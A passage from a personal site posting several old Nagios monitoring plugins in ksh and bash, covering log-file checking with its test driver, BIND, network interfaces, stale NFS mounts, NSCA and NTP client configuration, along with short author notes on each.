then
    rm $oldlog
    cat $logfile > $oldlog
    TEMPcount=0
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $WARNquery | wc -l | awk '{print $1}')
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $CRITquery | wc -l | awk '{print $1}')

    if [ $TEMPcount -gt 0 ]
    then
       echo "Log check data initialized... Last line contained error message."
       echo $STATE_WARNING > $oldlog.STATE
       exit $STATE_WARNING
    else
       echo "Log check data initialized..."
       echo $STATE_OK > $oldlog.STATE
       exit $STATE_OK
    fi
fi

# The oldlog file exists, so compare it to the original log now

# The temporary file that the script should use while
# processing the log file.
if [ -x mktemp ]; then
    tempdiff=`mktemp /tmp/check_log.XXXXXXXXXX`
else
    tempdate=`/bin/date '+%H%M%S'`
    tempdiff="/tmp/check_log.${tempdate}"
    touch $tempdiff
fi

diff $logfile $oldlog > $tempdiff

if [ `wc -l $tempdiff | awk '{print $1}'` -eq 0 ]
then
     rm $tempdiff
     touch $oldlog.STATE
     exitstatus=`cat $oldlog.STATE`
     echo "LOG FILE - No status change detected. Status = $exitstatus"
     exit $exitstatus
fi

# Count the number of matching log entries we have
CRITcount=`grep -c "$CRITquery" $tempdiff`
WARNcount=`grep -c "$WARNquery" $tempdiff`

# Get the last matching entry in the diff file
CRITlastentry=`grep "$CRITquery" $tempdiff | tail -1`
WARNlastentry=`grep "$WARNquery" $tempdiff | tail -1`

rm $tempdiff
cat $logfile > $oldlog

if [ "$CRITcount" -gt 0 ]; then
    	echo "($CRITcount) $CRITlastentry"
    	echo $STATE_CRITICAL > $oldlog.STATE
	exit $STATE_CRITICAL
fi

if [ "$WARNcount" -gt 0 ]; then
    	echo "($WARNcount) $WARNlastentry"
    	echo $STATE_WARNING > $oldlog.STATE
	exit $STATE_WARNING
fi

echo "Log check ok - 0 pattern matches found"
exit $STATE_OK



echo "Starting clean"
rm /tmp/foobar /usr/local/nagios/var/foobar*
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Starting normally"
echo "baka"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "baka"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "warning"
echo "bla" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "warning"
echo "bla" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Log rotation with crit"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Log rotation with warn"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "warning"
echo "bla" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Normal log rotation"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_named

2006-06-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor to check whether BIND is up and running. It checks for a number of processes and tries to perform a basic lookup using the localhost.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

A Critical is sent if:

A) one or more of the required processes is not running, or

B) the script is unable to perform a basic lookup using the localhost.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!


#!/usr/bin/bash
#
# DNS / Named process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_named
#
# Description:
# This plugin determines whether the named DNS server
# is running properly. It will check the following:
# * Are all required processes running?
# * Is it possible to make DNS requests?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when the abovementioned criteria are
# not matched.
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Named DNS monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep named | grep -v grep | grep -v nagios | wc -l` -lt 1 ]; then 
		echo "NAMED NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_service()
{
	SERVICE=0
	nslookup www.google.com localhost >/dev/null 2>&1
	if [ $? -eq 1 ]; then SERVICE=1;fi

	if [ $SERVICE -eq 1 ]; then 
		echo "SQUID NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_service

echo "NAMED OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus

kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_networking

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

I couldn't find an easy way to check whether all interfaces of a host are up and running from the -inside-, so I wrote a Nagios plugin to do this.

Naturally you could also try to ping all of the IP addresses of all of these network cards, but this isn't always possible. Lord knows how many routing issues I had fight through to get our current IP set monitored. I guess using this script is a bit easier :)

The script was tested on Redhat ES3, Mac OSX and Solaris. Its basic requirement is the Korn shell (due to some conversions happening inside the script). On Linux/RH you'll need mii-tool (and sudo) and on Solaris you'll need Perl (for one lousy piece of math :p ).

EDIT:

Oh! Just like my other recent Nagios scripts, check_networking comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.



#!/usr/bin/ksh
#
# Basic UNIX networking check script.
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide SYS, the Netherlands
# Last Modified: 22-06-2006
#
# Usage: ./check_networking
#
# Description:
#   This plugin determines whether the local host's network interfaces
# are all up and running like they should. It uses the following
# questions to determine this.
# * Does /sbin/mii-tool report any problems? (Linux only)
# * Are the gateways for each subnet pingable?
#
# Limitations:
# * I have no clue whether mii-tool is something specific to Redhat ES3,
#   or whether all Linii have it. 
# * Sudo access to mii-tool is required for the nagios account.
# * Perl is required on Solaris, to do just tiny bit of math.
# * KSH is required.
# * The script assumes that the first available IP from a subnet is the
#   router.
#
# Output:
#   The script retunrs a CRIT when one of the criteria mentioned
# above is not matched.
#
# Other notes:
#   I wish I'd learn Perl. I'm sure that doing all of this stuff in Perl
# would have cut down on the size of this script tremendously. Ah well.
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details. 
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

# Enabling the following dumps information into DEBUGFILE at various
# stages during the execution of this script.
DEBUG="0"
DEBUGFILE="/tmp/foobar"


### REQUISITE NAGIOS USER INTERFACE STUFF ###

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

[ $DEBUG -gt 0 ] && rm $DEBUGFILE 

print_usage() {
        echo "Usage: $PROGNAME"
        echo "Usage: $PROGNAME --help"
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Basic UNIX networking check plugin for Nagios"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}

while test -n "$1"
do
        case "$1" in
          --help) print_help; exit $STATE_OK;;
          -h) print_help; exit $STATE_OK;;
          *) print_usage; exit $STATE_UNKNOWN;;
        esac
done


### SETTING UP THE ENVIRONMENT ###

# Host OS check and warning message
MIITOOL="0"
if [ -f /sbin/mii-tool ]
then
        MIITOOL="1"

        sudo /sbin/mii-tool >/dev/null 2>&1
        if [ $? -gt 0 ]
        then
                echo "ERROR: sudo permissions"
                echo ""
                echo "This script requires that the Nagios user account has"
                echo "sudo permissions for the mii-tool command. Currently it"
                echo "does not have these permissions. Please fix this."
                echo ""
                exit $STATE_UNKNOWN
        fi
fi


### SUB-ROUTINE DEFINITIONS ### 

function convert_base
{
        typeset -i${2:-16} x
        x=$1
        echo $x
}

function subnet_router
{
[ $DEBUG -gt 0 ] && echo "- Starting subnet_router -" >> $DEBUGFILE
    first="0"; second="0"; third="0"; fourth="0"
    first=`echo $1 | cut -c 1-8`; FIRST=`convert_base 2#$first 10`
[ $DEBUG -gt 0 ] && echo "First: $first $FIRST" >> $DEBUGFILE
    second=`echo $1 | cut -c 9-16`; SECOND=`convert_base 2#$second 10`
[ $DEBUG -gt 0 ] && echo "Second: $second $SECOND" >> $DEBUGFILE
    third=`echo $1 | cut -c 17-24`; THIRD=`convert_base 2#$third 10`
[ $DEBUG -gt 0 ] && echo "Third: $third $THIRD" >> $DEBUGFILE
    fourth=`echo $1 | cut -c 25-32`
    [ `echo $fourth|wc -c` -gt 1 ] || fourth="0"
    TEMPCOUNT=`echo $fourth | wc -c | awk '{print $1}'`
    let PADDING=9-$TEMPCOUNT 
[ $DEBUG -gt 0 ] && echo "Fourth: padding fourth with $PADDING zeroes" >> $DEBUGFILE
    i=1
    while ((i <= $PADDING));
    do
       fourth=$fourth"0" 
       let i=$i+1
    done
    FOURTH=`convert_base 2#$fourth 10`; let FOURTH=$FOURTH+1
[ $DEBUG -gt 0 ] && echo "Fourth: $fourth $FOURTH" >> $DEBUGFILE

    echo "$FIRST.$SECOND.$THIRD.$FOURTH"
}

gather_interfaces_linux()
{
[ $DEBUG -gt 0 ] && echo "- Starting gather_interfaces_linux -" >> $DEBUGFILE
    for INTF in `ifconfig -a | grep ^[a-z] | grep -v ^lo | awk '{print $1}'`
    do
	if [ `echo $INTF | grep : | wc -l` -gt 0 ]
	then
            export INTERFACES="`echo $INTF|awk -F: '{print $1}'` $INTERFACES"
	else
            export INTERFACES="$INTF $INTERFACES"
	fi
    done

    INTFCOUNT=`echo $INTERFACES | wc -w`
[ $DEBUG -gt 0 ] && echo "Interfaces: There are $INTFCOUNT interfaces: $INTERFACES." >> $DEBUGFILE
    if [ $INTFCOUNT -lt 1 ] 
    then
	echo "NOK - No active network interfaces."
	exit $STATE_CRITICAL
    fi
}

gather_interfaces_darwin()
{
[ $DEBUG -gt 0 ] && echo "- Starting gather_interfaces_darwin -" >> $DEBUGFILE
    for INTF in `ifconfig -a | grep ^[a-z] | grep -v ^gif | grep -v ^stf | grep -v ^lo | awk '{print $1}'`
    do
        [ `echo $INTF | grep : | wc -l` -gt 0 ] && INTF=`echo $INTF|awk -F: '{print $1}'`
	[ `ifconfig $INTF | grep "status: inactive" | wc -l` -gt 0 ] && break
        INTERFACES="$INTF $INTERFACES" 
    done

    INTFCOUNT=`echo $INTERFACES | wc -w`
[ $DEBUG -gt 0 ] && echo "Interfaces: There are $INTFCOUNT interfaces: $INTERFACES." >> $DEBUGFILE
    if [ $INTFCOUNT -lt 1 ] 
    then
	echo "NOK - No active network interfaces."
	exit $STATE_CRITICAL
    fi
}

gather_gateway_linux()
{
[ $DEBUG -gt 0 ] && echo "- Starting gather_gateway_linux for interface $1 -" >> $DEBUGFILE
    MASKBIN=""
    MASK=`ifconfig $1 | grep Mask | awk '{print $4}' | awk -F: '{print $2}'` 
    for PART in `echo $MASK | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
        MASKBIN="$MASKBIN`convert_base $PART 2  | awk -F# '{print $2}'`"
    done
[ $DEBUG -gt 0 ] && echo "Mask: $MASK $MASKBIN" >> $DEBUGFILE

        BITCOUNT=`echo $MASKBIN | grep -o 1 | wc -l | awk '{print $1}'`

[ $DEBUG -gt 0 ] && echo "Bitcount: $BITCOUNT" >> $DEBUGFILE

    IPBIN=""
    IP=`ifconfig $1 | grep "inet addr" | awk '{print $2}' | awk -F: '{print $2}'` 
    for PART in `echo $IP | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
        TEMPBIN=`convert_base $PART 2 | awk -F# '{print $2}'`
        TEMPCOUNT=`echo $TEMPBIN | wc -c | awk '{print $1}'`
        let PADDING=9-$TEMPCOUNT
        i=1
        while ((i <= $PADDING));
        do
            IPBIN=$IPBIN"0" 
            let i=$i+1
        done
        IPBIN=$IPBIN$TEMPBIN
    done
[ $DEBUG -gt 0 ] && echo "IP address: $IP $IPBIN" >> $DEBUGFILE

    CUT="1-$BITCOUNT"
[ $DEBUG -gt 0 ] && echo "Cutting: Cutting chars $CUT" >> $DEBUGFILE
    NETBIN=`echo $IPBIN | cut -c $CUT`
[ $DEBUG -gt 0 ] && echo "Netbin: $NETBIN" >> $DEBUGFILE
    ROUTER=`subnet_router $NETBIN`
[ $DEBUG -gt 0 ] && echo "Router: $ROUTER" >> $DEBUGFILE
    echo $ROUTER
}

gather_gateway_darwin()
{
[ $DEBUG -gt 0 ] && echo "- Starting gath_gateway_darwin for interface $1 -" >> $DEBUGFILE
    MASKBIN=""
    [ `uname` == "Darwin" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}' | awk -Fx '{print $2}'`
    [ `uname` == "SunOS" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}'`
    for PART in `echo 1 3 5 7`
    do
	let PLUSPART=$PART+1
	MASKPART=`echo $MASK | cut -c $PART-$PLUSPART`
        MASKBIN="$MASKBIN`convert_base 16#$MASKPART 2  | awk -F# '{print $2}'`"
    done
[ $DEBUG -gt 0 ] && echo "Mask: $MASK $MASKBIN" >> $DEBUGFILE

    BITCOUNT=`echo $MASKBIN | grep -o 1 | wc -l | awk '{print $1}'`
[ $DEBUG -gt 0 ] && echo "Bitcount: $BITCOUNT" >> $DEBUGFILE

    IPBIN=""
    IP=`ifconfig $1 | grep "inet " | awk '{print $2}'`
    for PART in `echo $IP | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
        TEMPBIN=`convert_base $PART 2 | awk -F# '{print $2}'`
        TEMPCOUNT=`echo $TEMPBIN | wc -c | awk '{print $1}'`
        let PADDING=9-$TEMPCOUNT
        i=1
        while ((i <= $PADDING));
        do
            TEMPBIN="0"$TEMPBIN
            let i=$i+1
        done
        IPBIN=$IPBIN$TEMPBIN
    done
[ $DEBUG -gt 0 ] && echo "IP address: $IP $IPBIN" >> $DEBUGFILE

    CUT="1-$BITCOUNT"
[ $DEBUG -gt 0 ] && echo "Cutting: cutting chars $CUT" >> $DEBUGFILE
    NETBIN=`echo $IPBIN | cut -c $CUT`
[ $DEBUG -gt 0 ] && echo "Netbin: $NETBIN" >> $DEBUGFILE
    ROUTER=`subnet_router $NETBIN`
[ $DEBUG -gt 0 ] && echo "Router: $ROUTER" >> $DEBUGFILE
    echo $ROUTER
}

gather_gateway_sunos()
{
[ $DEBUG -gt 0 ] && echo "- Starting gath_gateway_solaris for interface $1 -" >> $DEBUGFILE
    MASKBIN=""
    [ `uname` == "Darwin" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}' | awk -Fx '{print $2}'`
    [ `uname` == "SunOS" ] && MASK=`ifconfig $1 | grep netmask | awk '{print $4}'`
    for PART in `echo 1 3 5 7`
    do
        let PLUSPART=$PART+1
        MASKPART=`echo $MASK | cut -c $PART-$PLUSPART`
        MASKBIN="$MASKBIN`convert_base 16#$MASKPART 2  | awk -F# '{print $2}'`"
    done
[ $DEBUG -gt 0 ] && echo "Mask: $MASK $MASKBIN" >> $DEBUGFILE

# This piece of kludge also requires that all tabs are removed from the beginning of each line.
# Additional character needed to trick the counter below
# Shitty thing is that it doesn't work. Stupid "let" aryth engine...
#MASKBIN="$MASKBIN-"
#[ $DEBUG -gt 0 ] && echo "Bitcount: kludged binmask is $MASKBIN" >> $DEBUGFILE
#
#IFS="1"
#read TEMP << EOT
#echo $MASKBIN
#EOT
#let "BITCOUNT=(${#TEMP[@]} - 1)"
#IFS=" "

# The kludge above was replaced by this one line of Perl. 

    BITCOUNT=`echo $MASKBIN | perl -ne 'while(/1/g){++$count}; print "$count"'`
[ $DEBUG -gt 0 ] && echo "Bitcount: $BITCOUNT" >> $DEBUGFILE

    IPBIN=""
    IP=`ifconfig $1 | grep "inet " | awk '{print $2}'`
    for PART in `echo $IP | awk -F. '{print $1" "$2" "$3" "$4}'`
    do
[ $DEBUG -gt 0 ] && echo "IP part: converting part $PART" >> $DEBUGFILE
        TEMPBIN=`convert_base $PART 2 | awk -F# '{print $2}'`
[ $DEBUG -gt 0 ] && echo "IP part: converted part is $TEMPBIN" >> $DEBUGFILE
        TEMPCOUNT=`echo $TEMPBIN | wc -c | awk '{print $1}'`
[ $DEBUG -gt 0 ] && echo "IP part: this part is $TEMPCOUNT chars long." >> $DEBUGFILE
        let PADDING=9-$TEMPCOUNT
[ $DEBUG -gt 0 ] && echo "IP part: will be padded with $PADDING zeroes" >> $DEBUGFILE
        i=1
        while ((i <= $PADDING));
        do
            TEMPBIN="0"$TEMPBIN
            let i=$i+1
        done
        IPBIN=$IPBIN$TEMPBIN
    done
[ $DEBUG -gt 0 ] && echo "IP address: $IP $IPBIN" >> $DEBUGFILE

    CUT="1-$BITCOUNT"
[ $DEBUG -gt 0 ] && echo "Cutting: cutting chars $CUT" >> $DEBUGFILE
    NETBIN=`echo $IPBIN | cut -c $CUT`
[ $DEBUG -gt 0 ] && echo "Netbin: $NETBIN" >> $DEBUGFILE
    ROUTER=`subnet_router $NETBIN`
[ $DEBUG -gt 0 ] && echo "Router: $ROUTER" >> $DEBUGFILE
    echo $ROUTER
}

check_miitool()
{
[ $DEBUG -gt 0 ] && echo "- Starting check_miitool -" >> $DEBUGFILE
    COUNT="0"
    for INTF in `echo $INTERFACES`
    do
        [ `sudo /sbin/mii-tool $INTF | head -1 | grep -c ok` -gt 0 ] || let COUNT=$COUNT+1
        [ `sudo /sbin/mii-tool $INTF | head -1 | grep -c 100baseTx-FD` -gt 0 ] || let COUNT=$COUNT+1
        [ `sudo /sbin/mii-tool $INTF | head -1 | grep -c 1000baseTx-FD` -gt 0 ] || let COUNT=$COUNT+1
    done

    [ $COUNT -gt $INTFCOUNT ] && (echo "NOK - Problem with one of the interfaces"; exit $STATE_CRITICAL)
}

check_ping()
{
[ $DEBUG -gt 0 ] && echo "- Starting check_ping -" >> $DEBUGFILE
    INTF=""
    for INTF in `echo $INTERFACES`
    do
	case `uname` in
	    Linux) GATEWAY=`gather_gateway_linux $INTF`;;
	    Darwin) GATEWAY=`gather_gateway_darwin $INTF`;;
	    SunOS) GATEWAY=`gather_gateway_sunos $INTF`;;
	    *) echo "OS not supported by this check."; exit 1;;
	esac
[ $DEBUG -gt 0 ] && echo "Gateway: $GATEWAY" >> $DEBUGFILE

 	ping -c 3 $GATEWAY >/dev/null 2>&1
        if [ $? -gt 0 ] 
        then
            echo "NOK - Problem pinging gateway $GATEWAY"; exit $STATE_CRITICAL
        fi
    done
}


### THE MAIN ROUTINE FINALLY STARTS ###

case `uname` in
            Linux) gather_interfaces_linux;;
            Darwin) gather_interfaces_darwin;;
            #SunOS) gather_interfaces_sunos;;
            SunOS) gather_interfaces_linux;;
            *) echo "OS not supported by this check."; exit 1;;
        esac

[ $MIITOOL -eq 1 ] && check_miitool

check_ping

# None of the other subroutines forced us to exit 1 before here, so let's quit with a 0.
echo "OK - Everything running like it should"
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_nfs_stale

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

There really isn't much to say... This script is so fscking basic that it shames me to even put it up here among all the other projects


#!/usr/bin/bash
#
# NFS stale mounts monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 13-07-2006
# 
# Usage: ./check_nfs_stale
#
# Description:
# This script couldn't be simpler than it is. It just checks to see
# whether there are any stale NFS mounts present on the system. 
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# If there are stale NFS mounts, a CRIT is issued.
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PROGNAME="check_nfs_stale"
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NFS stale mounts monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

[ `df -k | grep "Stale NFS file handle" | wc -l` -gt 0 ] && (echo "NOK - Stale NFS mounts."; exit $STATE_CRITICAL)

# Nothing caused us to exit early, so we're okay.
echo "OK - No stale NFS mounts."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_nsca

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

At $CLIENT we've often run into problems with the NSCA daemon, where the daemon would not crash per se, but where it would also not process incoming service checks. The nsca process was still running, but it simply wasn't transferring the incoming results to the Nagios command file.

I was amazed to find that nobody else had written a script to do this! So I quickly wrote one.


#!/usr/bin/bash
#
# NSCA Nagios service results monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 16-08-2006
# 
# Usage: ./check_nsca
#
# Description:
# Aside from checking whether the NSCA process is still running, this script
# also attempts to insert a message into the Nagios queue. After sending a 
# message to the NSCA daemon, it will verify that the message is received by
# Nagios, by checking the nagios.log file. 
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# If the NSCA daemon, or something along the message path, is borked, a 
# CRIT message will be issued. 
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PROGNAME="check_nsca"
PATH="/usr/bin:/usr/sbin:/bin:/sbin"

NAGIOSHOME="/usr/local/nagios"
LIBEXEC="$NAGIOSHOME/libexec"
NAGVAR="$NAGIOSHOME/var"
NAGBIN="$NAGIOSHOME/bin"
NAGETC="$NAGIOSHOME/etc"

. $LIBEXEC/utils.sh


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NSCA Nagios service results monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done


### PLATFORM INDEPENDENCE ###

case `uname` in
	Linux) PSLIST="ps -ef";;
	SunOS) PSLIST="ps -ef";;
	Darwin) PSLIST="ps -ajx";;
	*) ;;
    esac


### CHECKING FOR THE NSCA PROCESS ###

[ `$PSLIST | grep nsca | grep -v grep | wc -l` -lt 1 ] && (echo "NSCA process not running."; exit $STATE_CRITICAL)


### INSERTING A TEST MESSAGE ###

DATE=`date +%Y%m%d%H%M`
STRING="`hostname`\tFOOBAR\t0\t$DATE This is a test of the emergency broadcast system.\n"

echo -e "$STRING" | $NAGBIN/send_nsca -H localhost -c $NAGETC/send_nsca.cfg >/dev/null 2>&1


### CHECKING THE NAGIOS LOG FILE ###

sleep 10

if [ `tail -1000 $NAGVAR/nagios.log | grep "emergency broadcast system" | grep $DATE | wc -l` -lt 1 ] 
then
	# Giving it a second try
	sleep 10
	if [ `tail -5000 $NAGVAR/nagios.log | grep "emergency broadcast system" | grep $DATE | wc -l` -lt 1 ]	
	then
		echo "NSCA daemon not processing check results."
		exit $STATE_CRITICAL
	fi
fi


### EXITING NORMALLY ###

echo "OK - NSCA working like it should."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_ntp_config

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

As far as I know there was no Nagios plugin that allowed you to really check your client configuration. I mean, it would be nice to know for sure that all your systems are syncing against the proper server... Wouldn't it?

The script was tested on Redhat ES3, Mac OS X and Solaris. Its basic requirement is the bash shell.

EDIT:

Oh! Just like my other recent Nagios scripts, check_ntp_config comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.



#!/usr/bin/bash
#
# CPU load monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 10-07-2006
# 
# Usage: ./check_ntp_config
#
# Description:
#   Well, there's not much to tell. We have no way of making sure that our 
# NTP clients are all configured in the right way, so I thought I'd make
# a Nagios check for it. ^_^ 
#   You can change the NTP config at the top of this script, to match your
# own situation.
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
#   If the NTP client config does not match what has been defined at the 
# top of this script, the script will return a WARN.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### DEFINING THE NTP CLIENT CONFIGURATION AS IT SHOULD BE ###
NTP_SERVER="ntp.wxs.nl"


### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="0"

if [ $DEBUG -gt 0 ]
then
        DEBUGFILE="/tmp/foobar"
        rm $DEBUGFILE >/dev/null 2>&1
fi


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NTP client configuration monitor plugin for Nagios"
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done


### DEFINING SUBROUTINES ###

function gather_config()
{
    case `uname` in
